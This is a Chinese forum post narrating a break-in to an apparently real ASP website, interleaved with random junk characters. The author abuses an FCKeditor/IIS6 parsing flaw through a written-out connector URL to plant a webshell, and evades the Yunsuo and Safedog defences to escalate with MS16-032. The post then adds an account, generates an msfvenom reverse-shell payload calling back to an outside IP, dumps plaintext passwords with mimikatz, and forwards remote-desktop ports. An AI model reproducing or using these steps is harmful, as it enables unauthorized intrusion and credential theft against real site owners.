|
* B4 R/ w. a$ ~# q) ]# ~5 ~, C
* g, U P/ e6 y# I7 g! T
6 f0 M% |2 ]! J( E
5 m `- w/ j5 n |
( a/ }( |* p. a9 U7 V+ S! `# g
- m' c/ u+ q7 T2 ?0 q& S9 s
$ ?4 |9 N5 K- G2 u9 l* j% l' `: ~
一、 利用getwebshell篇
4 Y8 J& l" N7 G2 u ^
- }. T, T* P* M, W首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
/ I8 V2 l2 e( I
0 o) W" T1 W1 T2 m: e- v
2 ~3 z: @& m: k @8 T1 c
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
# W1 M; X0 k/ p: U& G2 r
- ^8 Y& v, ?4 L$ Z2 [
下面我们构造一个asp目录,如: 0 B2 k! t0 s8 J, x) M8 p! c5 Z8 Q
. V6 v4 P9 q& M$ P9 ^ 4 Y3 y( p0 W6 ~1 i! o
http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975
' B0 r# e& z: c3 ~) w0 W; g% M. _
; C6 v2 l/ W9 x. j0 R+ e7 y' M F* _, F! |8 Z! C' y7 l9 [
然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
" N; I5 ~3 K5 J7 J3 D1 {
' z/ q. T5 O+ V0 y- f一、 绕过安全狗云锁提权并且加账号
1 Q, @5 N2 L* K ]/ f' U \0 E; [
$ n2 Z7 F) c5 N" j2 t% _' ?
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
6 B- ~9 n" D7 \5 s
' w) _& c1 n1 F& d6 V# K4 A- _* U4 x如图:
/ _$ M- u3 E/ _* D2 B
9 ]' M( P# D \9 v4 I3 g% g6 Z然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
* U& j6 ?( x1 i+ a4 V' O6 W
6 d9 x7 a6 m b) S/ n$ W9 J- A) ~9 v# p
一、 利用metasploit
7 D n: G' k9 f
, h1 x) a1 n2 q9 q# G首先用pentestbox生成一个64位的payload如下命令
, s9 |- i2 [4 z! w I
$ U5 H/ z; |3 F. J" X; K
msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
3 K0 E, k1 B5 s' d8 z% f
1 q0 o3 Q" q3 U- d, u3 N为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
% r1 q5 r' v6 V8 Y& X, y+ T
) ~% Z6 t4 R$ D R/ S下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图:
+ u2 Z: @/ }* R7 w
; y S, Q3 I; j/ b' \3 c. o2 p/ x$ l* | c
下面我们来做一个监听如下命令:
, ?/ z( O0 \- v. P
& Q% b# w$ F2 D, D2 Jportfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图:
5 H* c3 g; \( H) f5 Q
- p8 X2 K' {- z: L& ] - g4 R1 v+ a' ~9 e, J
| " X* g/ s3 i6 y! s, d- E1 V% b- @6 Q0 E! M; M
5 f3 A, }& \4 J& ~2 e' |/ M
$ T/ R4 J2 o' K# h! h' v+ A. j
9 R4 ?$ R% V; W8 d9 {" o, c% u
6 a0 y1 Z y* z+ D) t4 X5 o
; z5 j, N& v% |# j0 `
5 {( W4 Y* V% Y! A# Z k6 U
! i4 O7 T$ p: A# o6 T
[" Z/ s$ c9 t' ]: n" f 1 {5 L5 J6 x& I& F
, `1 i0 U* E+ q1 r$ u
! ?7 Z5 N2 V! E
( Y, \# H7 w' q
3 _6 F8 ~8 q- y- M6 d f7 M! {/ @
| 
发表于 2018-10-20 20:31:43
收藏
支持
反对
匿名
发表于 2021-11-20 23:30:06